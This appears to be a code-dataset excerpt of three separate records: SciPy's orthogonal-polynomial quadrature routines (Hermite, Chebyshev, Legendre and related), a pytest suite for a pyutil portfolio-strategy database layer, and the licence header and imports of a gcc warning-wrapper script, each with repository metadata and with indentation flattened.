# Terms for derivative of U
# http://dlmf.nist.gov/12.10#E46
C0 = -(b1*v0 + phip[0,:]*b0*v1) / zeta
C1 = -(b3*v0 + phip[0,:]*b2*v1 + phip[1,:]*b1*v2 + phip[2,:]*b0*v3) / zeta**4
C2 = -(b5*v0 + phip[0,:]*b4*v1 + phip[1,:]*b3*v2 + phip[2,:]*b2*v3 + phip[3,:]*b1*v4 + phip[4,:]*b0*v5) / zeta**7
D0 = a0*v0
D1 = (a2*v0 + phip[0,:]*a1*v1 + phip[1,:]*a0*v2) / zeta**3
D2 = (a4*v0 + phip[0,:]*a3*v1 + phip[1,:]*a2*v2 + phip[2,:]*a1*v3 + phip[3,:]*a0*v4) / zeta**6
# Derivative of U
# http://dlmf.nist.gov/12.10#E36
Ud = Pd * (Ai * (C0 + C1/mu**2.0 + C2/mu**4.0) / mu**(4.0/6.0) +
Aip * (D0 + D1/mu**2.0 + D2/mu**4.0))
return U, Ud
def _newton(n, x_initial, maxit=5):
"""Newton iteration for polishing the asymptotic approximation
to the zeros of the Hermite polynomials.
Parameters
----------
n : int
Quadrature order
x_initial : ndarray
Initial guesses for the roots
maxit : int
Maximal number of Newton iterations.
The default 5 is sufficient, usually
only one or two steps are needed.
Returns
-------
nodes : ndarray
Quadrature nodes
weights : ndarray
Quadrature weights
See Also
--------
roots_hermite_asy
"""
# Variable transformation
mu = sqrt(2.0*n + 1.0)
t = x_initial / mu
theta = arccos(t)
# Newton iteration
for i in range(maxit):
u, ud = _pbcf(n, theta)
dtheta = u / (sqrt(2.0) * mu * sin(theta) * ud)
theta = theta + dtheta
if max(abs(dtheta)) < 1e-14:
break
# Undo variable transformation
x = mu * cos(theta)
# Central node is always zero
if n % 2 == 1:
x[0] = 0.0
# Compute weights
w = exp(-x**2) / (2.0*ud**2)
return x, w
def _roots_hermite_asy(n):
r"""Gauss-Hermite (physicst's) quadrature for large n.
Computes the sample points and weights for Gauss-Hermite quadrature.
The sample points are the roots of the n-th degree Hermite polynomial,
:math:`H_n(x)`. These sample points and weights correctly integrate
polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-\infty, \infty]` with weight function :math:`f(x) = e^{-x^2}`.
This method relies on asymptotic expansions which work best for n > 150.
The algorithm has linear runtime making computation for very large n
feasible.
Parameters
----------
n : int
quadrature order
Returns
-------
nodes : ndarray
Quadrature nodes
weights : ndarray
Quadrature weights
See Also
--------
roots_hermite
References
----------
.. [townsend.trogdon.olver-2014]
Townsend, A. and Trogdon, T. and Olver, S. (2014)
*Fast computation of Gauss quadrature nodes and
weights on the whole real line*. :arXiv:`1410.5286`.
.. [townsend.trogdon.olver-2015]
Townsend, A. and Trogdon, T. and Olver, S. (2015)
*Fast computation of Gauss quadrature nodes and
weights on the whole real line*.
IMA Journal of Numerical Analysis
:doi:`10.1093/imanum/drv002`.
"""
iv = _initial_nodes(n)
nodes, weights = _newton(n, iv)
# Combine with negative parts
if n % 2 == 0:
nodes = hstack([-nodes[::-1], nodes])
weights = hstack([weights[::-1], weights])
else:
nodes = hstack([-nodes[-1:0:-1], nodes])
weights = hstack([weights[-1:0:-1], weights])
# Scale weights
weights *= sqrt(pi) / sum(weights)
return nodes, weights
def hermite(n, monic=False):
r"""Physicist's Hermite polynomial.
Defined by
.. math::
H_n(x) = (-1)^ne^{x^2}\frac{d^n}{dx^n}e^{-x^2};
:math:`H_n` is a polynomial of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
H : orthopoly1d
Hermite polynomial.
Notes
-----
The polynomials :math:`H_n` are orthogonal over :math:`(-\infty,
\infty)` with weight function :math:`e^{-x^2}`.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
if n == 0:
n1 = n + 1
else:
n1 = n
x, w, mu0 = roots_hermite(n1, mu=True)
wfunc = lambda x: exp(-x * x)
if n == 0:
x, w = [], []
hn = 2**n * _gam(n + 1) * sqrt(pi)
kn = 2**n
p = orthopoly1d(x, w, hn, kn, wfunc, (-inf, inf), monic,
lambda x: eval_hermite(n, x))
return p
# Hermite 2 He_n(x)
def roots_hermitenorm(n, mu=False):
r"""Gauss-Hermite (statistician's) quadrature.
Computes the sample points and weights for Gauss-Hermite quadrature.
The sample points are the roots of the n-th degree Hermite polynomial,
:math:`He_n(x)`. These sample points and weights correctly integrate
polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-\infty, \infty]` with weight function :math:`f(x) = e^{-x^2/2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
Notes
-----
For small n up to 150 a modified version of the Golub-Welsch
algorithm is used. Nodes are computed from the eigenvalue
problem and improved by one step of a Newton iteration.
The weights are computed from the well-known analytical formula.
For n larger than 150 an optimal asymptotic algorithm is used
which computes nodes and weights in a numerical stable manner.
The algorithm has linear runtime making computation for very
large n (several thousand or more) feasible.
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
numpy.polynomial.hermite_e.hermegauss
"""
m = int(n)
if n < 1 or n != m:
raise ValueError("n must be a positive integer.")
mu0 = np.sqrt(2.0*np.pi)
if n <= 150:
an_func = lambda k: 0.0*k
bn_func = lambda k: np.sqrt(k)
f = cephes.eval_hermitenorm
df = lambda n, x: n * cephes.eval_hermitenorm(n-1, x)
return _gen_roots_and_weights(m, mu0, an_func, bn_func, f, df, True, mu)
else:
nodes, weights = _roots_hermite_asy(m)
# Transform
nodes *= sqrt(2)
weights *= sqrt(2)
if mu:
return nodes, weights, mu0
else:
return nodes, weights
def hermitenorm(n, monic=False):
r"""Normalized (probabilist's) Hermite polynomial.
Defined by
.. math::
He_n(x) = (-1)^ne^{x^2/2}\frac{d^n}{dx^n}e^{-x^2/2};
:math:`He_n` is a polynomial of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
He : orthopoly1d
Hermite polynomial.
Notes
-----
The polynomials :math:`He_n` are orthogonal over :math:`(-\infty,
\infty)` with weight function :math:`e^{-x^2/2}`.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
if n == 0:
n1 = n + 1
else:
n1 = n
x, w, mu0 = roots_hermitenorm(n1, mu=True)
wfunc = lambda x: exp(-x * x / 2.0)
if n == 0:
x, w = [], []
hn = sqrt(2 * pi) * _gam(n + 1)
kn = 1.0
p = orthopoly1d(x, w, hn, kn, wfunc=wfunc, limits=(-inf, inf), monic=monic,
eval_func=lambda x: eval_hermitenorm(n, x))
return p
# The remainder of the polynomials can be derived from the ones above.
# Ultraspherical (Gegenbauer) C^(alpha)_n(x)
def roots_gegenbauer(n, alpha, mu=False):
r"""Gauss-Gegenbauer quadrature.
Computes the sample points and weights for Gauss-Gegenbauer quadrature.
The sample points are the roots of the n-th degree Gegenbauer polynomial,
:math:`C^{\alpha}_n(x)`. These sample points and weights correctly
integrate polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-1, 1]` with weight function
:math:`f(x) = (1 - x^2)^{\alpha - 1/2}`.
Parameters
----------
n : int
quadrature order
alpha : float
alpha must be > -0.5
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
m = int(n)
if n < 1 or n != m:
raise ValueError("n must be a positive integer.")
if alpha < -0.5:
raise ValueError("alpha must be greater than -0.5.")
elif alpha == 0.0:
# C(n,0,x) == 0 uniformly, however, as alpha->0, C(n,alpha,x)->T(n,x)
# strictly, we should just error out here, since the roots are not
# really defined, but we used to return something useful, so let's
# keep doing so.
return roots_chebyt(n, mu)
mu0 = np.sqrt(np.pi) * cephes.gamma(alpha + 0.5) / cephes.gamma(alpha + 1)
an_func = lambda k: 0.0 * k
bn_func = lambda k: np.sqrt(k * (k + 2 * alpha - 1)
/ (4 * (k + alpha) * (k + alpha - 1)))
f = lambda n, x: cephes.eval_gegenbauer(n, alpha, x)
df = lambda n, x: (-n*x*cephes.eval_gegenbauer(n, alpha, x)
+ (n + 2*alpha - 1)*cephes.eval_gegenbauer(n-1, alpha, x))/(1-x**2)
return _gen_roots_and_weights(m, mu0, an_func, bn_func, f, df, True, mu)
def gegenbauer(n, alpha, monic=False):
r"""Gegenbauer (ultraspherical) polynomial.
Defined to be the solution of
.. math::
(1 - x^2)\frac{d^2}{dx^2}C_n^{(\alpha)}
- (2\alpha + 1)x\frac{d}{dx}C_n^{(\alpha)}
+ n(n + 2\alpha)C_n^{(\alpha)} = 0
for :math:`\alpha > -1/2`; :math:`C_n^{(\alpha)}` is a polynomial
of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
C : orthopoly1d
Gegenbauer polynomial.
Notes
-----
The polynomials :math:`C_n^{(\alpha)}` are orthogonal over
:math:`[-1,1]` with weight function :math:`(1 - x^2)^{(\alpha -
1/2)}`.
"""
base = jacobi(n, alpha - 0.5, alpha - 0.5, monic=monic)
if monic:
return base
# Abrahmowitz and Stegan 22.5.20
factor = (_gam(2*alpha + n) * _gam(alpha + 0.5) /
_gam(2*alpha) / _gam(alpha + 0.5 + n))
base._scale(factor)
base.__dict__['_eval_func'] = lambda x: eval_gegenbauer(float(n), alpha, x)
return base
# Chebyshev of the first kind: T_n(x) =
# n! sqrt(pi) / _gam(n+1./2)* P^(-1/2,-1/2)_n(x)
# Computed anew.
def roots_chebyt(n, mu=False):
r"""Gauss-Chebyshev (first kind) quadrature.
Computes the sample points and weights for Gauss-Chebyshev quadrature.
The sample points are the roots of the n-th degree Chebyshev polynomial of
the first kind, :math:`T_n(x)`. These sample points and weights correctly
integrate polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-1, 1]` with weight function :math:`f(x) = 1/\sqrt{1 - x^2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
numpy.polynomial.chebyshev.chebgauss
"""
m = int(n)
if n < 1 or n != m:
raise ValueError('n must be a positive integer.')
x = np.cos(np.arange(2 * m - 1, 0, -2) * pi / (2 * m))
w = np.empty_like(x)
w.fill(pi/m)
if mu:
return x, w, pi
else:
return x, w
def chebyt(n, monic=False):
r"""Chebyshev polynomial of the first kind.
Defined to be the solution of
.. math::
(1 - x^2)\frac{d^2}{dx^2}T_n - x\frac{d}{dx}T_n + n^2T_n = 0;
:math:`T_n` is a polynomial of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
T : orthopoly1d
Chebyshev polynomial of the first kind.
Notes
-----
The polynomials :math:`T_n` are orthogonal over :math:`[-1, 1]`
with weight function :math:`(1 - x^2)^{-1/2}`.
See Also
--------
chebyu : Chebyshev polynomial of the second kind.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
wfunc = lambda x: 1.0 / sqrt(1 - x * x)
if n == 0:
return orthopoly1d([], [], pi, 1.0, wfunc, (-1, 1), monic,
lambda x: eval_chebyt(n, x))
n1 = n
x, w, mu = roots_chebyt(n1, mu=True)
hn = pi / 2
kn = 2**(n - 1)
p = orthopoly1d(x, w, hn, kn, wfunc, (-1, 1), monic,
lambda x: eval_chebyt(n, x))
return p
# Chebyshev of the second kind
# U_n(x) = (n+1)! sqrt(pi) / (2*_gam(n+3./2)) * P^(1/2,1/2)_n(x)
def roots_chebyu(n, mu=False):
r"""Gauss-Chebyshev (second kind) quadrature.
Computes the sample points and weights for Gauss-Chebyshev quadrature.
The sample points are the roots of the n-th degree Chebyshev polynomial of
the second kind, :math:`U_n(x)`. These sample points and weights correctly
integrate polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-1, 1]` with weight function :math:`f(x) = \sqrt{1 - x^2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
m = int(n)
if n < 1 or n != m:
raise ValueError('n must be a positive integer.')
t = np.arange(m, 0, -1) * pi / (m + 1)
x = np.cos(t)
w = pi * np.sin(t)**2 / (m + 1)
if mu:
return x, w, pi / 2
else:
return x, w
def chebyu(n, monic=False):
r"""Chebyshev polynomial of the second kind.
Defined to be the solution of
.. math::
(1 - x^2)\frac{d^2}{dx^2}U_n - 3x\frac{d}{dx}U_n
+ n(n + 2)U_n = 0;
:math:`U_n` is a polynomial of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
U : orthopoly1d
Chebyshev polynomial of the second kind.
Notes
-----
The polynomials :math:`U_n` are orthogonal over :math:`[-1, 1]`
with weight function :math:`(1 - x^2)^{1/2}`.
See Also
--------
chebyt : Chebyshev polynomial of the first kind.
"""
base = jacobi(n, 0.5, 0.5, monic=monic)
if monic:
return base
factor = sqrt(pi) / 2.0 * _gam(n + 2) / _gam(n + 1.5)
base._scale(factor)
return base
# Chebyshev of the first kind C_n(x)
def roots_chebyc(n, mu=False):
r"""Gauss-Chebyshev (first kind) quadrature.
Computes the sample points and weights for Gauss-Chebyshev quadrature.
The sample points are the roots of the n-th degree Chebyshev polynomial of
the first kind, :math:`C_n(x)`. These sample points and weights correctly
integrate polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-2, 2]` with weight function :math:`f(x) = 1/\sqrt{1 - (x/2)^2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
x, w, m = roots_chebyt(n, True)
x *= 2
w *= 2
m *= 2
if mu:
return x, w, m
else:
return x, w
def chebyc(n, monic=False):
r"""Chebyshev polynomial of the first kind on :math:`[-2, 2]`.
Defined as :math:`C_n(x) = 2T_n(x/2)`, where :math:`T_n` is the
nth Chebychev polynomial of the first kind.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
C : orthopoly1d
Chebyshev polynomial of the first kind on :math:`[-2, 2]`.
Notes
-----
The polynomials :math:`C_n(x)` are orthogonal over :math:`[-2, 2]`
with weight function :math:`1/\sqrt{1 - (x/2)^2}`.
See Also
--------
chebyt : Chebyshev polynomial of the first kind.
References
----------
.. [1] Abramowitz and Stegun, "Handbook of Mathematical Functions"
Section 22. National Bureau of Standards, 1972.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
if n == 0:
n1 = n + 1
else:
n1 = n
x, w, mu0 = roots_chebyc(n1, mu=True)
if n == 0:
x, w = [], []
hn = 4 * pi * ((n == 0) + 1)
kn = 1.0
p = orthopoly1d(x, w, hn, kn,
wfunc=lambda x: 1.0 / sqrt(1 - x * x / 4.0),
limits=(-2, 2), monic=monic)
if not monic:
p._scale(2.0 / p(2))
p.__dict__['_eval_func'] = lambda x: eval_chebyc(n, x)
return p
# Chebyshev of the second kind S_n(x)
def roots_chebys(n, mu=False):
r"""Gauss-Chebyshev (second kind) quadrature.
Computes the sample points and weights for Gauss-Chebyshev quadrature.
The sample points are the roots of the n-th degree Chebyshev polynomial of
the second kind, :math:`S_n(x)`. These sample points and weights correctly
integrate polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-2, 2]` with weight function :math:`f(x) = \sqrt{1 - (x/2)^2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
x, w, m = roots_chebyu(n, True)
x *= 2
w *= 2
m *= 2
if mu:
return x, w, m
else:
return x, w
def chebys(n, monic=False):
r"""Chebyshev polynomial of the second kind on :math:`[-2, 2]`.
Defined as :math:`S_n(x) = U_n(x/2)` where :math:`U_n` is the
nth Chebychev polynomial of the second kind.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
S : orthopoly1d
Chebyshev polynomial of the second kind on :math:`[-2, 2]`.
Notes
-----
The polynomials :math:`S_n(x)` are orthogonal over :math:`[-2, 2]`
with weight function :math:`\sqrt{1 - (x/2)}^2`.
See Also
--------
chebyu : Chebyshev polynomial of the second kind
References
----------
.. [1] Abramowitz and Stegun, "Handbook of Mathematical Functions"
Section 22. National Bureau of Standards, 1972.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
if n == 0:
n1 = n + 1
else:
n1 = n
x, w, mu0 = roots_chebys(n1, mu=True)
if n == 0:
x, w = [], []
hn = pi
kn = 1.0
p = orthopoly1d(x, w, hn, kn,
wfunc=lambda x: sqrt(1 - x * x / 4.0),
limits=(-2, 2), monic=monic)
if not monic:
factor = (n + 1.0) / p(2)
p._scale(factor)
p.__dict__['_eval_func'] = lambda x: eval_chebys(n, x)
return p
# Shifted Chebyshev of the first kind T^*_n(x)
def roots_sh_chebyt(n, mu=False):
r"""Gauss-Chebyshev (first kind, shifted) quadrature.
Computes the sample points and weights for Gauss-Chebyshev quadrature.
The sample points are the roots of the n-th degree shifted Chebyshev
polynomial of the first kind, :math:`T_n(x)`. These sample points and
weights correctly integrate polynomials of degree :math:`2n - 1` or less
over the interval :math:`[0, 1]` with weight function
:math:`f(x) = 1/\sqrt{x - x^2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
xw = roots_chebyt(n, mu)
return ((xw[0] + 1) / 2,) + xw[1:]
def sh_chebyt(n, monic=False):
r"""Shifted Chebyshev polynomial of the first kind.
Defined as :math:`T^*_n(x) = T_n(2x - 1)` for :math:`T_n` the nth
Chebyshev polynomial of the first kind.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
T : orthopoly1d
Shifted Chebyshev polynomial of the first kind.
Notes
-----
The polynomials :math:`T^*_n` are orthogonal over :math:`[0, 1]`
with weight function :math:`(x - x^2)^{-1/2}`.
"""
base = sh_jacobi(n, 0.0, 0.5, monic=monic)
if monic:
return base
if n > 0:
factor = 4**n / 2.0
else:
factor = 1.0
base._scale(factor)
return base
# Shifted Chebyshev of the second kind U^*_n(x)
def roots_sh_chebyu(n, mu=False):
r"""Gauss-Chebyshev (second kind, shifted) quadrature.
Computes the sample points and weights for Gauss-Chebyshev quadrature.
The sample points are the roots of the n-th degree shifted Chebyshev
polynomial of the second kind, :math:`U_n(x)`. These sample points and
weights correctly integrate polynomials of degree :math:`2n - 1` or less
over the interval :math:`[0, 1]` with weight function
:math:`f(x) = \sqrt{x - x^2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
x, w, m = roots_chebyu(n, True)
x = (x + 1) / 2
m_us = cephes.beta(1.5, 1.5)
w *= m_us / m
if mu:
return x, w, m_us
else:
return x, w
def sh_chebyu(n, monic=False):
r"""Shifted Chebyshev polynomial of the second kind.
Defined as :math:`U^*_n(x) = U_n(2x - 1)` for :math:`U_n` the nth
Chebyshev polynomial of the second kind.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
U : orthopoly1d
Shifted Chebyshev polynomial of the second kind.
Notes
-----
The polynomials :math:`U^*_n` are orthogonal over :math:`[0, 1]`
with weight function :math:`(x - x^2)^{1/2}`.
"""
base = sh_jacobi(n, 2.0, 1.5, monic=monic)
if monic:
return base
factor = 4**n
base._scale(factor)
return base
# Legendre
def roots_legendre(n, mu=False):
r"""Gauss-Legendre quadrature.
Computes the sample points and weights for Gauss-Legendre quadrature.
The sample points are the roots of the n-th degree Legendre polynomial
:math:`P_n(x)`. These sample points and weights correctly integrate
polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-1, 1]` with weight function :math:`f(x) = 1.0`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
numpy.polynomial.legendre.leggauss
"""
m = int(n)
if n < 1 or n != m:
raise ValueError("n must be a positive integer.")
mu0 = 2.0
an_func = lambda k: 0.0 * k
bn_func = lambda k: k * np.sqrt(1.0 / (4 * k * k - 1))
f = cephes.eval_legendre
df = lambda n, x: (-n*x*cephes.eval_legendre(n, x)
+ n*cephes.eval_legendre(n-1, x))/(1-x**2)
return _gen_roots_and_weights(m, mu0, an_func, bn_func, f, df, True, mu)
def legendre(n, monic=False):
r"""Legendre polynomial.
Defined to be the solution of
.. math::
\frac{d}{dx}\left[(1 - x^2)\frac{d}{dx}P_n(x)\right]
+ n(n + 1)P_n(x) = 0;
:math:`P_n(x)` is a polynomial of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
P : orthopoly1d
Legendre polynomial.
Notes
-----
The polynomials :math:`P_n` are orthogonal over :math:`[-1, 1]`
with weight function 1.
Examples
--------
Generate the 3rd-order Legendre polynomial 1/2*(5x^3 + 0x^2 - 3x + 0):
>>> from scipy.special import legendre
>>> legendre(3)
poly1d([ 2.5, 0. , -1.5, 0. ])
"""
if n < 0:
raise ValueError("n must be nonnegative.")
if n == 0:
n1 = n + 1
else:
n1 = n
x, w, mu0 = roots_legendre(n1, mu=True)
if n == 0:
x, w = [], []
hn = 2.0 / (2 * n + 1)
kn = _gam(2 * n + 1) / _gam(n + 1)**2 / 2.0**n
p = orthopoly1d(x, w, hn, kn, wfunc=lambda x: 1.0, limits=(-1, 1),
monic=monic, eval_func=lambda x: eval_legendre(n, x))
return p
# Shifted Legendre P^*_n(x)
def roots_sh_legendre(n, mu=False):
r"""Gauss-Legendre (shifted) quadrature.
Computes the sample points and weights for Gauss-Legendre quadrature.
The sample points are the roots of the n-th degree shifted Legendre
polynomial :math:`P^*_n(x)`. These sample points and weights correctly
integrate polynomials of degree :math:`2n - 1` or less over the interval
:math:`[0, 1]` with weight function :math:`f(x) = 1.0`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
x, w = roots_legendre(n)
x = (x + 1) / 2
w /= 2
if mu:
return x, w, 1.0
else:
return x, w
def sh_legendre(n, monic=False):
r"""Shifted Legendre polynomial.
Defined as :math:`P^*_n(x) = P_n(2x - 1)` for :math:`P_n` the nth
Legendre polynomial.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
P : orthopoly1d
Shifted Legendre polynomial.
Notes
-----
The polynomials :math:`P^*_n` are orthogonal over :math:`[0, 1]`
with weight function 1.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
wfunc = lambda x: 0.0 * x + 1.0
if n == 0:
return orthopoly1d([], [], 1.0, 1.0, wfunc, (0, 1), monic,
lambda x: eval_sh_legendre(n, x))
x, w, mu0 = roots_sh_legendre(n, mu=True)
hn = 1.0 / (2 * n + 1.0)
kn = _gam(2 * n + 1) / _gam(n + 1)**2
p = orthopoly1d(x, w, hn, kn, wfunc, limits=(0, 1), monic=monic,
eval_func=lambda x: eval_sh_legendre(n, x))
return p
# -----------------------------------------------------------------------------
# Code for backwards compatibility
# -----------------------------------------------------------------------------
# Import functions in case someone is still calling the orthogonal
# module directly. (They shouldn't be; it's not in the public API).
poch = cephes.poch
from ._ufuncs import (binom, eval_jacobi, eval_sh_jacobi, eval_gegenbauer,
eval_chebyt, eval_chebyu, eval_chebys, eval_chebyc,
eval_sh_chebyt, eval_sh_chebyu, eval_legendre,
eval_sh_legendre, eval_genlaguerre, eval_laguerre,
eval_hermite, eval_hermitenorm)
# Make the old root function names an alias for the new ones
_modattrs = globals()
for newfun, oldfun in _rootfuns_map.items():
_modattrs[oldfun] = _modattrs[newfun]
__all__.append(oldfun)
| bsd-3-clause | -6,653,320,370,332,630,000 | 27.296154 | 139 | 0.55544 | false |
lobnek/pyutil | test/test_mongo/test_engine/test_strategy.py | 1 | 3434 | from pyutil.mongo.engine.strategy import Strategy, strategies, configuration
from pyutil.mongo.engine.symbol import Symbol, Group
from pyutil.performance.drawdown import drawdown
from pyutil.performance.month import monthlytable
from pyutil.performance.return_series import from_nav
from pyutil.portfolio.portfolio import similar
import pandas.testing as pt
from test.config import *
@pytest.fixture()
def group():
Group.objects.delete()
return Group(name="US Equity").save()
@pytest.fixture()
def symbols(group, portfolio):
Symbol.objects.delete()
# add the symbols to database
for symbol in portfolio.assets:
Symbol(name=symbol, group=group).save()
def test_strategy(symbols, portfolio):
Strategy.objects.delete()
s = Strategy(name="mdt", type="mdt", active=True, source="AAA")
assert s.source == "AAA"
assert s.type == "mdt"
assert s.active
assert s.portfolio is None
assert s.last_valid_index is None
# empty dictionary as portfolio hasn't been set
assert Strategy.portfolios(strategies=[s]) == {}
s.save()
frame = Strategy.reference_frame()
assert frame.index.name == "strategy"
s.portfolio = portfolio
pt.assert_frame_equal(s.portfolio.weights, portfolio.weights)
pt.assert_frame_equal(s.portfolio.prices, portfolio.prices)
s.save()
similar(Strategy.portfolios(strategies=[s])["mdt"], portfolio)
navs = Strategy.navs()
assert not navs["mdt"].empty
frame = Strategy.sectors(strategies=[s])
assert frame.index.name == "Portfolio"
assert set(frame.keys()) == {"US Equity", "Total"}
assert frame.loc["mdt"]["US Equity"] == pytest.approx(0.308974, abs=1e-5)
def test_source(portfolio):
with open(resource("source.py"), "r") as f:
s = Strategy(name="Peter", source=f.read(), active=True, type="wild")
# construct the configuration based on the strategy (and it's source code)
c = configuration(strategy=s)
# verify the names of the configuration
assert c.names == portfolio.assets
# also possible to ask the strategy directly
assert s.assets == portfolio.assets
def test_last_valid(portfolio):
s = Strategy(name="Maffay", source="AAA", active=True, type="wild2")
s.portfolio = portfolio
assert s.last_valid_index == portfolio.prices.last_valid_index()
assert similar(s.portfolio, portfolio)
def test_strategies():
folder = resource(name="strat")
for name, source in strategies(folder=folder):
assert name in {"P1", "P2"}
def test_active():
Strategy.objects.delete()
Strategy(name="A", active=False).save()
Strategy(name="B", active=True).save()
assert len(Strategy.active_strategies()) == 1
assert len(Strategy.objects) == 2
def test_drawdown(portfolio):
Strategy.objects.delete()
s = Strategy(name="Maffay", source="")
s.portfolio = portfolio
pt.assert_series_equal(drawdown(portfolio.nav), s.drawdown)
def test_volatility(portfolio):
Strategy.objects.delete()
s = Strategy(name="Maffay", source="")
s.portfolio = portfolio
pt.assert_series_equal(from_nav(portfolio.nav).ewm_volatility().dropna(), s.ewm_volatility())
def test_monthlytable(portfolio):
Strategy.objects.delete()
s = Strategy(name="Maffay", source="")
s.portfolio = portfolio
pt.assert_frame_equal(monthlytable(portfolio.nav.pct_change()), s.monthlytable) | mit | 5,867,971,628,889,860,000 | 29.39823 | 97 | 0.689866 | false |
KlinkOnE/caf-port | scripts/gcc-wrapper.py | 1 | 3550 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2011, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Invoke gcc, looking for warnings, and causing a failure if there are
# non-whitelisted warnings.
import re
import os
